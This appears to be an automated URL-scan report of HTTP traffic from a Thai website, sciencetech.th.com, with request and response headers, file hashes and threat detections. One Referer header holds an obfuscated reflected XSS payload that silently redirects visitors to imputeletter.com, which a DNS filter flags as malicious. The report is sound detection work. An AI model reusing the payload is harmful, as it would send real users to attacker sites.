access-control-allow-headers: Authorization,Content-Type,Accept,Origin,User-Agent,DNT,Cache-Control,X-Mx-ReqToken,Keep-Alive,X-Requested-With,If-Modified-Since,X-CSRF-Token,token
access-control-allow-methods: GET,POST
access-control-allow-origin: *
access-control-expose-headers: 
access-control-max-age: 86400
cache-control: max-age=0, private, must-revalidate
x-request-id: 5d7bbf0367f7ab0b65d7ac79570f58ad
strict-transport-security: max-age=15724800; includeSubDomains
X-Firefox-Spdy: h2

sciencetech.th.com/images/BG.jpg

203.155.35.132

81 kB

URL
sciencetech.th.com/images/BG.jpg
IP
203.155.35.132:0
ASN
#7693 KSC Commercial Internet Co. Ltd.

File type
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 780x748, components 3
Size
81 kB (81116 bytes)
Hash
f89f9b90c27770b0dcfd2282f6dd6bee
2dbeeb739219a577ea1f1c749108f89a7d7c373e
ce206eed934bc5c162c853e2e0a86dc5399ae83b841fde1a250a1f36dbdda63b

HTTP Headers

GET /images/BG.jpg HTTP/1.1
Host: sciencetech.th.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/index.asp?PageShow=%22%3E%3Cscript%3Ewindow[%27location%27][%27replace%27]([%27h%27,%20%27t%27,%20%27t%27,%20%27p%27,%20%27s%27,%20%27:%27,%20%27/%27,%20%27/%27,%20%27i%27,%20%27m%27,%20%27p%27,%20%27u%27,%20%27t%27,%20%27e%27,%20%27l%27,%20%27e%27,%20%27t%27,%20%27t%27,%20%27e%27,%20%27r%27,%20%27.%27,%20%27c%27,%20%27o%27,%20%27m%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27b%27,%20%27c%27,%20%27b%27,%20%272%27,%20%270%27,%20%27b%27,%20%273%27,%20%273%27,%20%27d%27,%20%270%27,%20%27c%27,%20%27e%27,%20%272%27,%20%270%27,%20%27f%27,%20%27c%27,%20%272%27,%20%276%27,%20%275%27,%20%27a%27,%20%27b%27,%20%27a%27,%20%27c%27,%20%27c%27,%20%27e%27,%20%279%27,%20%27b%27,%20%270%27,%20%279%27,%20%278%27,%20%276%27,%20%27/%27,%20%2711/227-8796/964-98483-15685%27][%27join%27](%27%27)),document[%27body%27][%27style%27][%27opacity%27]=0x0;%3C/script%3E
Cookie: ASPSESSIONIDAQQTBQQB=ENHDHCIAMOMBIJAALGKPCDGB
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Fri, 27 Oct 2023 15:02:40 GMT
Accept-Ranges: bytes
ETag: "8f2d90a1e68da1:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Tue, 07 May 2024 20:01:51 GMT
Content-Length: 81116

api.cookiewow.com/api/v1/page_views

52.74.172.97

21 B

URL
api.cookiewow.com/api/v1/page_views
IP
52.74.172.97:0
ASN
#16509 AMAZON-02

File type
JSON text data
Size
21 B (21 bytes)
Hash
8736cdfe08480bca66cffeee06268705
81af0417f969f93848b1cf30fce1db93884facc1
838a7c62adda8d131d694ae13ba2c5b73579aeb0f327d9f23e23880943a8a289

HTTP Headers

POST /api/v1/page_views HTTP/1.1
Host: api.cookiewow.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
token: ey3UiKz55sMpvLSeTHEXdzdi
Origin: http://sciencetech.th.com
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
TE: trailers

HTTP/2 201 Created
date: Tue, 07 May 2024 20:01:54 GMT
content-type: application/json; charset=utf-8
content-length: 21
access-control-allow-credentials: true
access-control-allow-origin: *
access-control-expose-headers: 
cache-control: max-age=0, private, must-revalidate
x-request-id: 27c6470d195dd181eb7948b16e8d380a
strict-transport-security: max-age=15724800; includeSubDomains
X-Firefox-Spdy: h2

cookiecdn.com/images/powered-by-cookiewow.png

54.230.111.85

7.8 kB

URL
cookiecdn.com/images/powered-by-cookiewow.png
IP
54.230.111.85:0
ASN
#16509 AMAZON-02

File type
PNG image data, 439 x 57, 8-bit/color RGBA, non-interlaced
Size
7.8 kB (7780 bytes)
Hash
cea3f70d8fbe3e1eb1589dacfc64166f
7b647a3aa2d66435b7a807bda8d058f158b22258
ce0d7ad278ef6264746820c57ff09bfc7578e535b3fef391fddda2362e115f01

HTTP Headers

GET /images/powered-by-cookiewow.png HTTP/1.1
Host: cookiecdn.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

HTTP/2 200 OK
content-type: image/png
content-length: 7780
last-modified: Tue, 21 Jun 2022 07:27:28 GMT
x-amz-server-side-encryption: AES256
x-amz-version-id: _CYop3j0cULv9pRy25D32xMA9vsKmSta
accept-ranges: bytes
server: AmazonS3
date: Tue, 07 May 2024 20:01:55 GMT
etag: "cea3f70d8fbe3e1eb1589dacfc64166f"
vary: Accept-Encoding
x-cache: RefreshHit from cloudfront
via: 1.1 9037b7743a833da13439f0d4e2619b52.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: T8oG69dKPRjyzjLffIfA29afrpJHuB8dNW1lvkH3-XlJlv2DwOObEA==
X-Firefox-Spdy: h2

imputeletter.com/0/0/0/0bcb20b33d0ce20fc265abacce9b0986/11/227-8796/964-98483-15685

0.0.0.0

0 B

URL User Request GET
imputeletter.com/0/0/0/0bcb20b33d0ce20fc265abacce9b0986/11/227-8796/964-98483-15685
IP
0.0.0.0:0
ASN
#0

File type

Size
0 B (0 bytes)
Hash
d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Detections

Analyzer	Verdict	Alert
Quad9 DNS	malicious	Sinkholed

HTTP Headers

GET /0/0/0/0bcb20b33d0ce20fc265abacce9b0986/11/227-8796/964-98483-15685 HTTP/1.1
Host: imputeletter.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

Report Overview

Submitted URL

IP

ASN

Submitted

Access

Website Title

Final URL

Tags

urlquery detections

Detections

urlquery

Network Intrusion Detection

Threat Detection Systems

Domain Summary

Related reports

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Threat Detection Systems

Public InfoSec YARA rules

OpenPhish

PhishTank

mnemonic secure dns

Quad9 DNS

ThreatFox

JavaScript (1)

URL

IP

ASN

Introduced by

Embedded in HTML

Observations

Hash

HTTP Transactions (15)

URL

IP

ASN

File type

Size

Hash

HTTP Headers

URL

IP

ASN

File type

Size

Hash

HTTP Headers

URL

IP

ASN

File type

Size

Hash

HTTP Headers

URL

IP

ASN

File type

Size

Hash

HTTP Headers

URL

IP

ASN

File type

Size

Hash

HTTP Headers

URL

IP

ASN

File type

Size

Hash

HTTP Headers

URL

IP

ASN

File type